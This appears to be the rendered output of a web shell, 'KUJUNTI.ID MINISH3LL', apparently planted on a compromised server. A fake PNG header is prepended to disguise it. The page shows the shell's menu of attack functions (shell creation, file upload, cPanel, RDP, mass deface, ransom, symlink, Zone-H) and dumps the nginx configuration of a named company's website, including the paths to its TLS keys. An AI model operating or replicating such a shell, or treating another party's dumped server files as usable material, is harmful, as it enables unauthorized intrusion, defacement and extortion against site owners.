\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 www.csarite.com
KUJUNTI.ID MINISH3LL
Path : /etc/nginx/sites-enabled/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : //etc/nginx/sites-enabled/beyler.conf


server {

    root /var/www/html/beylermadencilik.com/public_html;
    index index.html index.htm;
    client_max_body_size 256M;
    server_name www.beylermadencilik.com beylermadencilik.com;


error_log   /var/log/nginx/error_log   error;

location ~* \.(?:jpg|jpeg|gif|png|ico|cur|gz|svg|svgz|mp4|ogg|ogv|webm|htc)$ {
     expires 365d;
     add_header Cache-Control "public";
   }



location ~* \.(?:css|js)$ {
  expires 1y;
  access_log off;
  add_header Cache-Control "public";
}


location / {
       # Block user enumeration
      # if ( $query_string ~ "author=([0-9]*)" ) { return 403; }
       try_files $uri $uri/ /index.php?q=$uri&$args;
        }



 location ~ \.php$ {
                try_files $uri =404;
                fastcgi_split_path_info ^(.+\.php)(/.+)$;
                fastcgi_pass unix:/var/run/php/php5.6-fpm.sock;
                fastcgi_index index.php;
                fastcgi_param SCRIPT_FILENAME $request_filename;
                include fastcgi_params;
        }





    listen 443 ssl; # managed by Certbot
    ssl_certificate /etc/letsencrypt/live/www.beylermadencilik.com/fullchain.pem; # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/www.beylermadencilik.com/privkey.pem; # managed by Certbot
    include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot


}

server {
    if ($host = beylermadencilik.com) {
        return 301 https://$host$request_uri;
    } # managed by Certbot


    if ($host = www.beylermadencilik.com) {
        return 301 https://$host$request_uri;
    } # managed by Certbot


    server_name www.beylermadencilik.com beylermadencilik.com;
    listen 80;
    return 404; # managed by Certbot




}

© KUJUNTI.ID